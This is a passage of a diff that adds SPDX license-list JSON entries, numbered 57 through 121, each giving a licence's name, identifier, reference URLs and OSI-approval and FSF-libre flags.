+ "http://www.latex-project.org/lppl/lppl-1-2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-94.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-94.json",
+ "referenceNumber": 57,
+ "name": "Spencer License 94",
+ "licenseId": "Spencer-94",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.2.json",
+ "referenceNumber": 58,
+ "name": "Open LDAP Public License v1.2",
+ "licenseId": "OLDAP-1.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d42b0383c50c299977b5893ee695cf4e486fb0dc7"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/O-UDA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/O-UDA-1.0.json",
+ "referenceNumber": 59,
+ "name": "Open Use of Data Agreement v1.0",
+ "licenseId": "O-UDA-1.0",
+ "seeAlso": [
+ "https://github.com/microsoft/Open-Use-of-Data-Agreement/blob/v1.0/O-UDA-1.0.md",
+ "https://cdla.dev/open-use-of-data-agreement-v1-0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.7.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.7.json",
+ "referenceNumber": 60,
+ "name": "Open LDAP Public License v2.7",
+ "licenseId": "OLDAP-2.7",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d47c2415c1df81556eeb39be6cad458ef87c534a2"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Glulxe.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Glulxe.json",
+ "referenceNumber": 61,
+ "name": "Glulxe License",
+ "licenseId": "Glulxe",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Glulxe"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/iMatix.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/iMatix.json",
+ "referenceNumber": 62,
+ "name": "iMatix Standard Function Library Agreement",
+ "licenseId": "iMatix",
+ "seeAlso": [
+ "http://legacy.imatix.com/html/sfl/sfl4.htm#license"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TAPR-OHL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TAPR-OHL-1.0.json",
+ "referenceNumber": 63,
+ "name": "TAPR Open Hardware License v1.0",
+ "licenseId": "TAPR-OHL-1.0",
+ "seeAlso": [
+ "https://www.tapr.org/OHL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NBPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NBPL-1.0.json",
+ "referenceNumber": 64,
+ "name": "Net Boolean Public License v1",
+ "licenseId": "NBPL-1.0",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d37b4b3f6cc4bf34e1d3dec61e69914b9819d8894"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-R-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-R-1.1.json",
+ "referenceNumber": 65,
+ "name": "Licence Libre du Québec – Réciprocité version 1.1",
+ "licenseId": "LiLiQ-R-1.1",
+ "seeAlso": [
+ "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-liliq-r-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-R-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Noweb.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Noweb.json",
+ "referenceNumber": 66,
+ "name": "Noweb License",
+ "licenseId": "Noweb",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Noweb"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC0-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC0-1.0.json",
+ "referenceNumber": 67,
+ "name": "Creative Commons Zero v1.0 Universal",
+ "licenseId": "CC0-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/publicdomain/zero/1.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-Protection.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-Protection.json",
+ "referenceNumber": 68,
+ "name": "BSD Protection License",
+ "licenseId": "BSD-Protection",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD_Protection_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.5.json",
+ "referenceNumber": 69,
+ "name": "Creative Commons Attribution Non Commercial 2.5 Generic",
+ "licenseId": "CC-BY-NC-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zlib.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zlib.json",
+ "referenceNumber": 70,
+ "name": "zlib License",
+ "licenseId": "Zlib",
+ "seeAlso": [
+ "http://www.zlib.net/zlib_license.html",
+ "https://opensource.org/licenses/Zlib"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.json",
+ "referenceNumber": 71,
+ "name": "GNU Free Documentation License v1.3 or later - invariants",
+ "licenseId": "GFDL-1.3-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-AT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-AT.json",
+ "referenceNumber": 72,
+ "name": "Creative Commons Attribution 3.0 Austria",
+ "licenseId": "CC-BY-3.0-AT",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/at/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.3c.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.3c.json",
+ "referenceNumber": 73,
+ "name": "LaTeX Project Public License v1.3c",
+ "licenseId": "LPPL-1.3c",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-3c.txt",
+ "https://opensource.org/licenses/LPPL-1.3c"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPL-1.0.json",
+ "referenceNumber": 74,
+ "name": "Eclipse Public License 1.0",
+ "licenseId": "EPL-1.0",
+ "seeAlso": [
+ "http://www.eclipse.org/legal/epl-v10.html",
+ "https://opensource.org/licenses/EPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.json",
+ "referenceNumber": 75,
+ "name": "GNU Free Documentation License v1.1 or later - invariants",
+ "licenseId": "GFDL-1.1-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ANTLR-PD-fallback.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ANTLR-PD-fallback.json",
+ "referenceNumber": 76,
+ "name": "ANTLR Software Rights Notice with license fallback",
+ "licenseId": "ANTLR-PD-fallback",
+ "seeAlso": [
+ "http://www.antlr2.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.4.json",
+ "referenceNumber": 77,
+ "name": "Open LDAP Public License v2.4",
+ "licenseId": "OLDAP-2.4",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcd1284c4a91a8a380d904eee68d1583f989ed386"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.3.json",
+ "referenceNumber": 78,
+ "name": "Open LDAP Public License v2.3",
+ "licenseId": "OLDAP-2.3",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dd32cf54a32d581ab475d23c810b0a7fbaf8d63c3"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-2.1.json",
+ "referenceNumber": 79,
+ "name": "Zope Public License 2.1",
+ "licenseId": "ZPL-2.1",
+ "seeAlso": [
+ "http://old.zope.org/Resources/ZPL/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-2.0.json",
+ "referenceNumber": 80,
+ "name": "Apache License 2.0",
+ "licenseId": "Apache-2.0",
+ "seeAlso": [
+ "https://www.apache.org/licenses/LICENSE-2.0",
+ "https://opensource.org/licenses/Apache-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-2.0.json",
+ "referenceNumber": 81,
+ "name": "SGI Free Software License B v2.0",
+ "licenseId": "SGI-B-2.0",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.2.0.pdf"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Hippocratic-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Hippocratic-2.1.json",
+ "referenceNumber": 82,
+ "name": "Hippocratic License 2.1",
+ "licenseId": "Hippocratic-2.1",
+ "seeAlso": [
+ "https://firstdonoharm.dev/version/2/1/license.html",
+ "https://github.com/EthicalSource/hippocratic-license/blob/58c0e646d64ff6fbee275bfe2b9492f914e3ab2a/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.json",
+ "referenceNumber": 83,
+ "name": "Creative Commons Attribution Share Alike 3.0 Germany",
+ "licenseId": "CC-BY-SA-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.json",
+ "referenceNumber": 84,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 1.0 Generic",
+ "licenseId": "CC-BY-NC-SA-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-or-later.json",
+ "referenceNumber": 85,
+ "name": "GNU Lesser General Public License v2.1 or later",
+ "licenseId": "LGPL-2.1-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-US.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-US.json",
+ "referenceNumber": 86,
+ "name": "Creative Commons Attribution 3.0 United States",
+ "licenseId": "CC-BY-3.0-US",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/us/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TCP-wrappers.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TCP-wrappers.json",
+ "referenceNumber": 87,
+ "name": "TCP Wrappers License",
+ "licenseId": "TCP-wrappers",
+ "seeAlso": [
+ "http://rc.quest.com/topics/openssh/license.php#tcpwrappers"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.json",
+ "referenceNumber": 88,
+ "name": "GNU Free Documentation License v1.2 or later - invariants",
+ "licenseId": "GFDL-1.2-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Eurosym.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Eurosym.json",
+ "referenceNumber": 89,
+ "name": "Eurosym License",
+ "licenseId": "Eurosym",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Eurosym"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1.json",
+ "referenceNumber": 90,
+ "name": "GNU Free Documentation License v1.1",
+ "licenseId": "GFDL-1.1",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.0.json",
+ "referenceNumber": 91,
+ "name": "LaTeX Project Public License v1.0",
+ "licenseId": "LPPL-1.0",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-0.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0+.json",
+ "referenceNumber": 92,
+ "name": "GNU Library General Public License v2 or later",
+ "licenseId": "LGPL-2.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-1.0.json",
+ "referenceNumber": 93,
+ "name": "SGI Free Software License B v1.0",
+ "licenseId": "SGI-B-1.0",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.1.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APL-1.0.json",
+ "referenceNumber": 94,
+ "name": "Adaptive Public License 1.0",
+ "licenseId": "APL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/APL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/libtiff.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libtiff.json",
+ "referenceNumber": 95,
+ "name": "libtiff License",
+ "licenseId": "libtiff",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/libtiff"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-2.1.json",
+ "referenceNumber": 96,
+ "name": "Academic Free License v2.1",
+ "licenseId": "AFL-2.1",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-2.1.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-1.0.json",
+ "referenceNumber": 97,
+ "name": "Creative Commons Attribution Non Commercial 1.0 Generic",
+ "licenseId": "CC-BY-NC-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GD.json",
+ "referenceNumber": 98,
+ "name": "GD License",
+ "licenseId": "GD",
+ "seeAlso": [
+ "https://libgd.github.io/manuals/2.3.0/files/license-txt.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-1.1.json",
+ "referenceNumber": 99,
+ "name": "Academic Free License v1.1",
+ "licenseId": "AFL-1.1",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-1.1.txt",
+ "http://wayback.archive.org/web/20021004124254/http://www.opensource.org/licenses/academic.php"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.json",
+ "referenceNumber": 100,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 IGO",
+ "licenseId": "CC-BY-NC-ND-3.0-IGO",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/igo/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-DFS-2015.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2015.json",
+ "referenceNumber": 101,
+ "name": "Unicode License Agreement - Data Files and Software (2015)",
+ "licenseId": "Unicode-DFS-2015",
+ "seeAlso": [
+ "https://web.archive.org/web/20151224134844/http://unicode.org/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-only.json",
+ "referenceNumber": 102,
+ "name": "GNU Free Documentation License v1.2 only",
+ "licenseId": "GFDL-1.2-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-1.1.json",
+ "referenceNumber": 103,
+ "name": "Mozilla Public License 1.1",
+ "licenseId": "MPL-1.1",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/MPL-1.1.html",
+ "https://opensource.org/licenses/MPL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-only.json",
+ "referenceNumber": 104,
+ "name": "GNU General Public License v2.0 only",
+ "licenseId": "GPL-2.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-4.0.json",
+ "referenceNumber": 105,
+ "name": "Creative Commons Attribution Non Commercial 4.0 International",
+ "licenseId": "CC-BY-NC-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FreeImage.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FreeImage.json",
+ "referenceNumber": 106,
+ "name": "FreeImage Public License v1.0",
+ "licenseId": "FreeImage",
+ "seeAlso": [
+ "http://freeimage.sourceforge.net/freeimage-license.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SHL-0.51.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SHL-0.51.json",
+ "referenceNumber": 107,
+ "name": "Solderpad Hardware License, Version 0.51",
+ "licenseId": "SHL-0.51",
+ "seeAlso": [
+ "https://solderpad.org/licenses/SHL-0.51/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Jython.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Jython.json",
+ "referenceNumber": 108,
+ "name": "CNRI Jython License",
+ "licenseId": "CNRI-Jython",
+ "seeAlso": [
+ "http://www.jython.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-1.1.json",
+ "referenceNumber": 109,
+ "name": "Zope Public License 1.1",
+ "licenseId": "ZPL-1.1",
+ "seeAlso": [
+ "http://old.zope.org/Resources/License/ZPL-1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Afmparse.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Afmparse.json",
+ "referenceNumber": 110,
+ "name": "Afmparse License",
+ "licenseId": "Afmparse",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Afmparse"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.1.json",
+ "referenceNumber": 111,
+ "name": "Open LDAP Public License v2.1",
+ "licenseId": "OLDAP-2.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db0d176738e96a0d3b9f85cb51e140a86f21be715"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Rdisc.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Rdisc.json",
+ "referenceNumber": 112,
+ "name": "Rdisc License",
+ "licenseId": "Rdisc",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Rdisc_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Imlib2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Imlib2.json",
+ "referenceNumber": 113,
+ "name": "Imlib2 License",
+ "licenseId": "Imlib2",
+ "seeAlso": [
+ "http://trac.enlightenment.org/e/browser/trunk/imlib2/COPYING",
+ "https://git.enlightenment.org/legacy/imlib2.git/tree/COPYING"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause-Shortened.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-Shortened.json",
+ "referenceNumber": 114,
+ "name": "BSD 4 Clause Shortened",
+ "licenseId": "BSD-4-Clause-Shortened",
+ "seeAlso": [
+ "https://metadata.ftp-master.debian.org/changelogs//main/a/arpwatch/arpwatch_2.1a15-7_copyright"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sendmail.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sendmail.json",
+ "referenceNumber": 115,
+ "name": "Sendmail License",
+ "licenseId": "Sendmail",
+ "seeAlso": [
+ "http://www.sendmail.com/pdfs/open_source/sendmail_license.pdf",
+ "https://web.archive.org/web/20160322142305/https://www.sendmail.com/pdfs/open_source/sendmail_license.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5.json",
+ "referenceNumber": 116,
+ "name": "Creative Commons Attribution 2.5 Generic",
+ "licenseId": "CC-BY-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AAL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AAL.json",
+ "referenceNumber": 117,
+ "name": "Attribution Assurance License",
+ "licenseId": "AAL",
+ "seeAlso": [
+ "https://opensource.org/licenses/attribution"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.json",
+ "referenceNumber": 118,
+ "name": "Mozilla Public License 2.0 (no copyleft exception)",
+ "licenseId": "MPL-2.0-no-copyleft-exception",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/2.0/",
+ "https://opensource.org/licenses/MPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.json",
+ "referenceNumber": 119,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 2.5 Generic",
+ "licenseId": "CC-BY-NC-ND-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-NL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-NL.json",
+ "referenceNumber": 120,
+ "name": "Creative Commons Attribution 3.0 Netherlands",
+ "licenseId": "CC-BY-3.0-NL",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/nl/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPL-1.02.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPL-1.02.json",
+ "referenceNumber": 121,
+ "name": "Lucent Public License v1.02",
+ "licenseId": "LPL-1.02",
+ "seeAlso": [
+ "http://plan9.bell-labs.com/plan9/license.html",
+ "https://opensource.org/licenses/LPL-1.02"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
